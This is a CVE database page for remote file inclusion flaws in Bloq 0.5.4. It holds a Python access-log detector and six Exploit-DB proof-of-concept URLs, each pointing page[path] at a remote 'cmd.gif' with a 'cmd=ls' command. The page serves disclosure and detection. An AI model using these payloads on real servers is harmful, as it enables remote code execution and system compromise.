CVE-2006-6592
Published 2006-12-15
Priority: P339 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.52% (82.9th percentile)
Multiple PHP remote file inclusion vulnerabilities in Bloq 0.5.4 allow remote attackers to execute arbitrary PHP code via a URL in the page[path] parameter to (1) index.php, (2) admin.php, (3) rss.php, (4) rdf.php, (5) rss2.php, or (6) files/mainfile.php.
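A log check for the request pattern described above, as an added example (not part of the CVE record, Exploit-DB, or Bloq): it flags requests to the six listed scripts whose page[path] value starts with a URL scheme. The common/combined access-log format and the sample lines are assumptions, constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# The six entry points named in the CVE description.
BLOQ_SCRIPTS = ("index.php", "admin.php", "rss.php", "rdf.php",
                "rss2.php", "files/mainfile.php")
# A value starting with a URL scheme (http:, ftp:, php:, data:, ...) means the
# include target is not a plain local relative path.
REMOTE_VALUE = re.compile(r"^[a-z][a-z0-9+.-]*:", re.I)
# Request line of a common/combined-format access log entry (assumed format).
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines, documentation addresses only
    '192.0.2.10 - - [13/Oct/2006:10:32:01 +0000] "GET /bloq/rdf.php?page[path]=http://www.example.com/cmd.gif?&cmd=ls HTTP/1.1" 200 512',
    '192.0.2.10 - - [13/Oct/2006:10:32:05 +0000] "GET /bloq/files/mainfile.php?page%5Bpath%5D=http%3A%2F%2Fwww.example.com%2Fcmd.gif%3F HTTP/1.1" 200 512',
    '198.51.100.7 - - [13/Oct/2006:10:33:00 +0000] "GET /bloq/index.php?id=4 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [13/Oct/2006:10:33:09 +0000] "GET /other/view.php?page[path]=http://www.example.com/x HTTP/1.1" 404 0',
]

def find_rfi_attempts(log_lines):
    """Return (line_number, script, value) for each suspicious request."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        path, _, query = match.group(1).partition("?")
        path = unquote(path)
        script = next((s for s in BLOQ_SCRIPTS if path.endswith("/" + s)), None)
        if script is None:
            continue
        # parse_qsl percent-decodes keys and values, so page%5Bpath%5D and
        # page[path] are recognised as the same parameter.
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key == "page[path]" and REMOTE_VALUE.match(value):
                hits.append((number, script, value))
    return hits

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

Access logs record only the query string, so a page[path] value sent in a POST body is not visible to this check.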
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php | bloq | — | — |
No detection rules found.
Exploit-DB
Bloq 0.5.4 - 'rdf.php?page[path]' Remote File Inclusion
exploitdb·2006-10-13
---
source: https://www.securityfocus.com/bid/20512/info
Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Version 0.5.4 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/[PATHTOSCRİPT]/rdf.php?page[path]=http://www.example.com/cmd.gif?&cmd=ls
Exploit-DB
Bloq 0.5.4 - 'index.php?page[path]' Remote File Inclusion
exploitdb·2006-10-13
---
source: https://www.securityfocus.com/bid/20512/info
Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Version 0.5.4 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/[PATHSCRİPT]/index.php?page[path]=http://www.example.com/cmd.gif?&cmd=ls
Exploit-DB
Bloq 0.5.4 - '/files/mainfile.php?page[path]' Remote File Inclusion
exploitdb·2006-10-13
---
source: https://www.securityfocus.com/bid/20512/info
Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Version 0.5.4 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/[PATHTOSCRİPT]/files/mainfile.php?page[path]=http://www.example.com/cmd.gif?&cmd=ls
Exploit-DB
Bloq 0.5.4 - 'rss2.php?page[path]' Remote File Inclusion
exploitdb·2006-10-13
---
source: https://www.securityfocus.com/bid/20512/info
Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Version 0.5.4 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/[PATHTOSCRİPT]/rss2.php?page[path]=http://www.example.com/cmd.gif?&cmd=ls
Exploit-DB
Bloq 0.5.4 - 'admin.php?page[path]' Remote File Inclusion
exploitdb·2006-10-13
---
source: https://www.securityfocus.com/bid/20512/info
Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Version 0.5.4 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/[PATHTOSCRİPT]/admin.php?page[path]=http://www.example.com/cmd.gif?&cmd=ls
Exploit-DB
Bloq 0.5.4 - 'rss.php?page[path]' Remote File Inclusion
exploitdb·2006-10-13
---
source: https://www.securityfocus.com/bid/20512/info
Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Version 0.5.4 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/[PATHTOSCRİPT]/rss.php?page[path]=http://www.example.com/cmd.gif?&cmd=ls
No writeups or analysis indexed.
http://securityreason.com/securityalert/2039
http://www.securityfocus.com/archive/1/448603/100/0/threaded
http://www.securityfocus.com/bid/20512
https://exchange.xforce.ibmcloud.com/vulnerabilities/29585